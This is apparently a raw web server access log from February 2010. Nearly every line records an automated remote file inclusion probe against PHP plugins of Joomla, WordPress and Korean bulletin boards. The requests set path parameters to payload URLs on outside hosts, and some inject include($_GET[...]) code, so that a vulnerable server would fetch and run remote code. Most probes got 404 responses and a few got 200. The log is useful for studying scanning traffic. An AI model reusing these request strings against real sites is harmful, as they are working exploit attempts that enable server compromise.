118.129.166.178 - - [08/Feb/2010:06:49:04 -0800] "GET /logs/access_100202.log//com_dbquery/compon/administrator//write_comment_update.php?board_skin_path=http://kjmed.net/bbs/idfx1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.116.103.118 - - [08/Feb/2010:06:50:25 -0800] "GET /logs/access_100115.log//popup_window.php?site_isp_root=http://eguruji.net/modlogan/daily_usage_200904.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.116.103.118 - - [08/Feb/2010:06:50:26 -0800] "GET /logs/access_100112.log//popup_window.php?site_isp_root=http://eguruji.net/modlogan/daily_usage_200904.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.208.14.52 - - [08/Feb/2010:06:51:22 -0800] "GET /logs/access_100201.log%20%20//content/multithumb/multithumb?mosConfig_absolute_path=http://www.bokji.or.kr/id/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.208.14.52 - - [08/Feb/2010:06:51:45 -0800] "GET /logs/access_100201.log%20%20//content/multithumb/multithumb?mosConfig_absolute_path=http://www.bokji.or.kr/id/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.176.226.164 - - [08/Feb/2010:06:51:49 -0800] "GET /logs/access_100109.log%20%20/phphtml.php?htmlclass_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.176.226.164 - - [08/Feb/2010:06:51:49 -0800] "GET /logs/phphtml.php?htmlclass_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.176.226.164 - - [08/Feb/2010:06:51:49 -0800] "GET /phphtml.php?htmlclass_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.208.14.52 - - [08/Feb/2010:06:52:29 -0800] "GET /logs/access_100126.log//content/multithumb/multithumb?mosConfig_absolute_path=http://www.bokji.or.kr/id/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.208.14.52 - - [08/Feb/2010:06:52:49 -0800] "GET /logs/access_100126.log//content/multithumb/multithumb?mosConfig_absolute_path=http://www.bokji.or.kr/id/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.176.226.164 - - [08/Feb/2010:06:52:49 -0800] "GET /logs/access_100108.log%20%20/phphtml.php?htmlclass_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
66.103.128.44 - - [08/Feb/2010:06:53:17 -0800] "GET /wordpress/wp-content/plugins/sniplets/modules/syntax_highlight.php?libpath=http://www.sarpifirenze.it/media/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
66.103.128.44 - - [08/Feb/2010:06:53:17 -0800] "GET /logs//wordpress/wp-content/plugins/sniplets/modules/syntax_highlight.php?libpath=http://www.sarpifirenze.it/media/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
66.103.128.44 - - [08/Feb/2010:06:53:17 -0800] "GET /logs/access_100104.log%20%20//wordpress/wp-content/plugins/sniplets/modules/syntax_highlight.php?libpath=http://www.sarpifirenze.it/media/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.119.103.12 - - [08/Feb/2010:06:53:50 -0800] "GET /logs/access_100125.log%20%20/administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.villantomagazin.com//1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
66.103.128.44 - - [08/Feb/2010:06:53:55 -0800] "GET /wordpress/wp-content/plugins/sniplets/modules/syntax_highlight.php?libpath=http://www.sarpifirenze.it/media/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
66.103.128.44 - - [08/Feb/2010:06:53:55 -0800] "GET /logs//wordpress/wp-content/plugins/sniplets/modules/syntax_highlight.php?libpath=http://www.sarpifirenze.it/media/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
66.103.128.44 - - [08/Feb/2010:06:53:55 -0800] "GET /logs/access_100104.log//wordpress/wp-content/plugins/sniplets/modules/syntax_highlight.php?libpath=http://www.sarpifirenze.it/media/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
66.103.128.44 - - [08/Feb/2010:06:53:56 -0800] "GET /logs/access_100103.log%20%20//wordpress/wp-content/plugins/sniplets/modules/syntax_highlight.php?libpath=http://www.sarpifirenze.it/media/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [08/Feb/2010:06:54:31 -0800] "GET /wordpress/wp-content/plugins/sniplets/modules/syntax_highlight.php?libpath=http://www.howtolisten.kr//bbs/data/community_freeboard/1262568611/img00.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [08/Feb/2010:06:54:33 -0800] "GET /logs//wordpress/wp-content/plugins/sniplets/modules/syntax_highlight.php?libpath=http://www.howtolisten.kr//bbs/data/community_freeboard/1262568611/img00.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [08/Feb/2010:06:54:33 -0800] "GET /wordpress/wp-content/plugins/sniplets/modules/syntax_highlight.php?libpath=http://www.howtolisten.kr//bbs/data/community_freeboard/1262568611/img00.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [08/Feb/2010:06:54:36 -0800] "GET /logs//wordpress/wp-content/plugins/sniplets/modules/syntax_highlight.php?libpath=http://www.howtolisten.kr//bbs/data/community_freeboard/1262568611/img00.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [08/Feb/2010:06:54:41 -0800] "GET /logs/access_100104.log%20%20//wordpress/wp-content/plugins/sniplets/modules/syntax_highlight.php?libpath=http://www.howtolisten.kr//bbs/data/community_freeboard/1262568611/img00.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [08/Feb/2010:06:55:21 -0800] "GET /logs/access_100104.log//wordpress/wp-content/plugins/sniplets/modules/syntax_highlight.php?libpath=http://www.howtolisten.kr//bbs/data/community_freeboard/1262568611/img00.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [08/Feb/2010:06:55:26 -0800] "GET /wordpress/wp-content/plugins/sniplets/modules/syntax_highlight.php?libpath=http://www.howtolisten.kr//bbs/data/community_freeboard/1262568611/img00.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [08/Feb/2010:06:55:27 -0800] "GET /logs//wordpress/wp-content/plugins/sniplets/modules/syntax_highlight.php?libpath=http://www.howtolisten.kr//bbs/data/community_freeboard/1262568611/img00.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [08/Feb/2010:06:55:33 -0800] "GET /wordpress/wp-content/plugins/sniplets/modules/syntax_highlight.php?libpath=http://www.howtolisten.kr//bbs/data/community_freeboard/1262568611/img00.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.70.72.86 - - [08/Feb/2010:06:55:33 -0800] "GET /bbs//skin/ggambo7002_board/write.php?dir=http://www.nsi.or.kr//ws/files/notice/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.70.72.86 - - [08/Feb/2010:06:55:34 -0800] "GET /logs/access_100103.log//bbs//skin/ggambo7002_board/write.php?dir=http://www.nsi.or.kr//ws/files/notice/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [08/Feb/2010:06:55:34 -0800] "GET /logs/access_100103.log%20%20//wordpress/wp-content/plugins/sniplets/modules/syntax_highlight.php?libpath=http://www.howtolisten.kr//bbs/data/community_freeboard/1262568611/img00.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.70.72.86 - - [08/Feb/2010:06:55:34 -0800] "GET /logs//bbs//skin/ggambo7002_board/write.php?dir=http://www.nsi.or.kr//ws/files/notice/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [08/Feb/2010:06:55:36 -0800] "GET /logs//wordpress/wp-content/plugins/sniplets/modules/syntax_highlight.php?libpath=http://www.howtolisten.kr//bbs/data/community_freeboard/1262568611/img00.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [08/Feb/2010:06:55:36 -0800] "GET /logs/access_100103.log%20%20//wordpress/wp-content/plugins/sniplets/modules/syntax_highlight.php?libpath=http://www.howtolisten.kr//bbs/data/community_freeboard/1262568611/img00.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [08/Feb/2010:06:55:38 -0800] "GET /logs/access_100104.log//wordpress/wp-content/plugins/sniplets/modules/syntax_highlight.php?libpath=http://www.howtolisten.kr//bbs/data/community_freeboard/1262568611/img00.txt???? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.176.226.164 - - [08/Feb/2010:06:55:43 -0800] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.176.226.164 - - [08/Feb/2010:06:55:43 -0800] "GET /phpsecurityadmin/include/logout.php?PSA_PATH=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.176.226.164 - - [08/Feb/2010:06:55:47 -0800] "GET /logs/access_100126.log%20%20//phpsecurityadmin/include/logout.php?PSA_PATH=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.176.226.164 - - [08/Feb/2010:06:55:54 -0800] "GET /logs/access_100109.log%20%20//phpsecurityadmin/include/logout.php?PSA_PATH=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.70.72.86 - - [08/Feb/2010:06:55:55 -0800] "GET /logs/access_100112.log//bbs//skin/ggambo7002_board/write.php?dir=http://www.nsi.or.kr//ws/files/notice/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.176.226.164 - - [08/Feb/2010:06:58:23 -0800] "GET /logs/access_100126.log//phpsecurityadmin/include/logout.php?PSA_PATH=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.176.226.164 - - [08/Feb/2010:06:58:41 -0800] "GET /logs/access_100109.log//phpsecurityadmin/include/logout.php?PSA_PATH=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
221.143.40.35 - - [08/Feb/2010:06:59:56 -0800] "GET /modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://eroadsky.com/new/autoalbum/Links/image3.jpg??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
221.143.40.35 - - [08/Feb/2010:06:59:56 -0800] "GET /logs//modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://eroadsky.com/new/autoalbum/Links/image3.jpg??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
221.143.40.35 - - [08/Feb/2010:06:59:57 -0800] "GET /logs/access_100125.log//modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://eroadsky.com/new/autoalbum/Links/image3.jpg??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [08/Feb/2010:06:59:59 -0800] "GET /phphtml.php?htmlclass_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [08/Feb/2010:06:59:59 -0800] "GET /logs/access_100109.log%20%20/phphtml.php?htmlclass_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [08/Feb/2010:06:59:59 -0800] "GET /logs/phphtml.php?htmlclass_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [08/Feb/2010:07:00:04 -0800] "GET /logs/access_100103.log%20%20/phphtml.php?htmlclass_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.129.166.178 - - [08/Feb/2010:07:00:41 -0800] "GET /components/com_galleria/board//write_comment_update.php?board_skin_path=http://kjmed.net/bbs/idfx1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.129.166.178 - - [08/Feb/2010:07:00:41 -0800] "GET /logs/access_100202.log/components/com_galleria/board//write_comment_update.php?board_skin_path=http://kjmed.net/bbs/idfx1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.129.166.178 - - [08/Feb/2010:07:00:41 -0800] "GET /logs/access_100129.log/components/com_galleria/board//write_comment_update.php?board_skin_path=http://kjmed.net/bbs/idfx1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.129.166.178 - - [08/Feb/2010:07:00:41 -0800] "GET /logs/components/com_galleria/board//write_comment_update.php?board_skin_path=http://kjmed.net/bbs/idfx1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [08/Feb/2010:07:02:30 -0800] "GET /phpsecurityadmin/include/logout.php?PSA_PATH=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [08/Feb/2010:07:02:30 -0800] "GET /logs/access_100109.log%20%20//phpsecurityadmin/include/logout.php?PSA_PATH=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [08/Feb/2010:07:02:30 -0800] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [08/Feb/2010:07:02:35 -0800] "GET /logs/access_100126.log%20%20//phpsecurityadmin/include/logout.php?PSA_PATH=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
72.241.52.111 - - [08/Feb/2010:07:03:04 -0800] "GET /logs//include/bbs.lib.inc.php?site_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
72.241.52.111 - - [08/Feb/2010:07:03:04 -0800] "GET /include/bbs.lib.inc.php?site_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.98.5 - - [08/Feb/2010:07:03:05 -0800] "GET //skin/buzzard_espoon/setup.php?dir=http://inji.es.kr//bbs///data/62/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.98.5 - - [08/Feb/2010:07:03:06 -0800] "GET /logs///skin/buzzard_espoon/setup.php?dir=http://inji.es.kr//bbs///data/62/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.98.5 - - [08/Feb/2010:07:03:06 -0800] "GET /logs/access_100109.log%20%20///skin/buzzard_espoon/setup.php?dir=http://inji.es.kr//bbs///data/62/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.98.5 - - [08/Feb/2010:07:03:10 -0800] "GET //skin/buzzard_espoon/setup.php?dir=http://inji.es.kr//bbs///data/62/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.98.5 - - [08/Feb/2010:07:03:10 -0800] "GET /logs/access_100109.log%20%20///skin/buzzard_espoon/setup.php?dir=http://inji.es.kr//bbs///data/62/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.98.5 - - [08/Feb/2010:07:03:11 -0800] "GET /logs///skin/buzzard_espoon/setup.php?dir=http://inji.es.kr//bbs///data/62/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
72.241.52.111 - - [08/Feb/2010:07:03:12 -0800] "GET /logs/access_100112.log%20%20//include/bbs.lib.inc.php?site_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
72.241.52.111 - - [08/Feb/2010:07:03:26 -0800] "GET /logs//include/bbs.lib.inc.php?site_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
72.241.52.111 - - [08/Feb/2010:07:03:26 -0800] "GET /logs/access_100112.log%20%20//include/bbs.lib.inc.php?site_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
72.241.52.111 - - [08/Feb/2010:07:03:26 -0800] "GET /include/bbs.lib.inc.php?site_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.98.5 - - [08/Feb/2010:07:03:30 -0800] "GET /logs/access_100201.log%20%20///skin/buzzard_espoon/setup.php?dir=http://inji.es.kr//bbs///data/62/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.98.5 - - [08/Feb/2010:07:03:38 -0800] "GET /logs/access_100201.log%20%20///skin/buzzard_espoon/setup.php?dir=http://inji.es.kr//bbs///data/62/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
221.139.0.75 - - [08/Feb/2010:07:03:48 -0800] "GET /logs/access_100125.log///?path=http://www.noin9191.com/ams/ammember/fx29id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
221.139.0.75 - - [08/Feb/2010:07:03:48 -0800] "GET /logs///?path=http://www.noin9191.com/ams/ammember/fx29id1.txt? HTTP/1.1" 200 4948 "-" "Mozilla/5.0" "www.puaga.com"
221.139.0.75 - - [08/Feb/2010:07:03:49 -0800] "GET //?path=http://www.noin9191.com/ams/ammember/fx29id1.txt? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
221.139.0.75 - - [08/Feb/2010:07:04:27 -0800] "GET /logs/access_100126.log///?path=http://www.noin9191.com/ams/ammember/fx29id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
72.241.52.111 - - [08/Feb/2010:07:04:39 -0800] "GET /logs/access_100201.log//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
72.241.52.111 - - [08/Feb/2010:07:05:21 -0800] "GET /logs/access_100103.log//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.208.14.52 - - [08/Feb/2010:07:05:39 -0800] "GET /logs///e404.php?DOCUMENT_ROOT=http://www.bokji.or.kr/id/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.208.14.52 - - [08/Feb/2010:07:05:39 -0800] "GET //e404.php?DOCUMENT_ROOT=http://www.bokji.or.kr/id/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.208.14.52 - - [08/Feb/2010:07:05:46 -0800] "GET /logs///e404.php?DOCUMENT_ROOT=http://www.bokji.or.kr/id/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.208.14.52 - - [08/Feb/2010:07:05:46 -0800] "GET //e404.php?DOCUMENT_ROOT=http://www.bokji.or.kr/id/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.208.14.52 - - [08/Feb/2010:07:05:57 -0800] "GET /logs/access_100112.log///e404.php?DOCUMENT_ROOT=http://www.bokji.or.kr/id/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.208.14.52 - - [08/Feb/2010:07:06:04 -0800] "GET /logs/access_100112.log///e404.php?DOCUMENT_ROOT=http://www.bokji.or.kr/id/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
66.103.128.44 - - [08/Feb/2010:07:06:23 -0800] "GET /administrator/components/com_sef/sef.class.php?mosConfig.absolute.path=http://www.sarpifirenze.it/media/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
66.103.128.44 - - [08/Feb/2010:07:06:23 -0800] "GET /logs//administrator/components/com_sef/sef.class.php?mosConfig.absolute.path=http://www.sarpifirenze.it/media/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
66.103.128.44 - - [08/Feb/2010:07:06:23 -0800] "GET /logs/access_100131.log//administrator/components/com_sef/sef.class.php?mosConfig.absolute.path=http://www.sarpifirenze.it/media/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
66.103.128.44 - - [08/Feb/2010:07:06:28 -0800] "GET /logs/access_100115.log//administrator/components/com_sef/sef.class.php?mosConfig.absolute.path=http://www.sarpifirenze.it/media/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.208.14.52 - - [08/Feb/2010:07:06:50 -0800] "GET /logs/access_100103.log///e404.php?DOCUMENT_ROOT=http://www.bokji.or.kr/id/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.129.166.178 - - [08/Feb/2010:07:06:50 -0800] "GET /delete_all.php?board_skin_path=http://kjmed.net/bbs/idfx1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.129.166.178 - - [08/Feb/2010:07:06:51 -0800] "GET /logs/access_100129.log/delete_all.php?board_skin_path=http://kjmed.net/bbs/idfx1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.208.14.52 - - [08/Feb/2010:07:06:51 -0800] "GET /logs/access_100103.log///e404.php?DOCUMENT_ROOT=http://www.bokji.or.kr/id/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.129.166.178 - - [08/Feb/2010:07:06:51 -0800] "GET /logs/access_100202.log/delete_all.php?board_skin_path=http://kjmed.net/bbs/idfx1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.129.166.178 - - [08/Feb/2010:07:06:51 -0800] "GET /logs/delete_all.php?board_skin_path=http://kjmed.net/bbs/idfx1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.115.213.195 - - [08/Feb/2010:07:07:17 -0800] "GET /administrator/components/com_jreactions/panel.about.php?mosConfig_absolute_path=http://www1.goldping.com/bbs/idxx.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.115.213.195 - - [08/Feb/2010:07:07:17 -0800] "GET /logs/access_100123.log/administrator/components/com_jreactions/panel.about.php?mosConfig_absolute_path=http://www1.goldping.com/bbs/idxx.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.115.213.195 - - [08/Feb/2010:07:07:17 -0800] "GET /logs/administrator/components/com_jreactions/panel.about.php?mosConfig_absolute_path=http://www1.goldping.com/bbs/idxx.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.115.213.195 - - [08/Feb/2010:07:07:31 -0800] "GET /logs/administrator/components/com_jreactions/panel.about.php?mosConfig_absolute_path=http://www1.goldping.com/bbs/idxx.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.115.213.195 - - [08/Feb/2010:07:07:31 -0800] "GET /logs/access_100123.log/administrator/components/com_jreactions/panel.about.php?mosConfig_absolute_path=http://www1.goldping.com/bbs/idxx.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.115.213.195 - - [08/Feb/2010:07:07:31 -0800] "GET /administrator/components/com_jreactions/panel.about.php?mosConfig_absolute_path=http://www1.goldping.com/bbs/idxx.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [08/Feb/2010:07:07:39 -0800] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.howtolisten.kr//bbs/data/community_freeboard/1262568611/img00.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [08/Feb/2010:07:07:39 -0800] "GET /logs/access_100117.log%20%20//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.howtolisten.kr//bbs/data/community_freeboard/1262568611/img00.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [08/Feb/2010:07:07:40 -0800] "GET /index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.howtolisten.kr//bbs/data/community_freeboard/1262568611/img00.txt???? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
81.176.226.164 - - [08/Feb/2010:07:07:43 -0800] "GET /logs/components/com_colorlab/admin.color.php?mosConfig_live_site=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.176.226.164 - - [08/Feb/2010:07:07:43 -0800] "GET /logs/access_100126.log%20%20/components/com_colorlab/admin.color.php?mosConfig_live_site=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.176.226.164 - - [08/Feb/2010:07:07:43 -0800] "GET /components/com_colorlab/admin.color.php?mosConfig_live_site=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
121.254.214.60 - - [08/Feb/2010:07:07:48 -0800] "GET /bbs//skin/ggambo7002_board/write.php?dir=http://www.nsi.or.kr//ws/files/notice/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.208.14.52 - - [08/Feb/2010:07:07:50 -0800] "GET /logs/access_100112.log%20%20///e404.php?DOCUMENT_ROOT=http://www.bokji.or.kr/id/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.208.14.52 - - [08/Feb/2010:07:07:50 -0800] "GET //e404.php?DOCUMENT_ROOT=http://www.bokji.or.kr/id/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.208.14.52 - - [08/Feb/2010:07:07:50 -0800] "GET /logs///e404.php?DOCUMENT_ROOT=http://www.bokji.or.kr/id/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
121.254.214.60 - - [08/Feb/2010:07:07:52 -0800] "GET /logs//bbs//skin/ggambo7002_board/write.php?dir=http://www.nsi.or.kr//ws/files/notice/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
121.254.214.60 - - [08/Feb/2010:07:07:56 -0800] "GET /logs/access_100103.log//bbs//skin/ggambo7002_board/write.php?dir=http://www.nsi.or.kr//ws/files/notice/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.131 - - [08/Feb/2010:07:07:59 -0800] "GET /logs//include/bbs.lib.inc.php?site_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.131 - - [08/Feb/2010:07:07:59 -0800] "GET /logs/access_100112.log%20%20//include/bbs.lib.inc.php?site_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.131 - - [08/Feb/2010:07:07:59 -0800] "GET /include/bbs.lib.inc.php?site_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
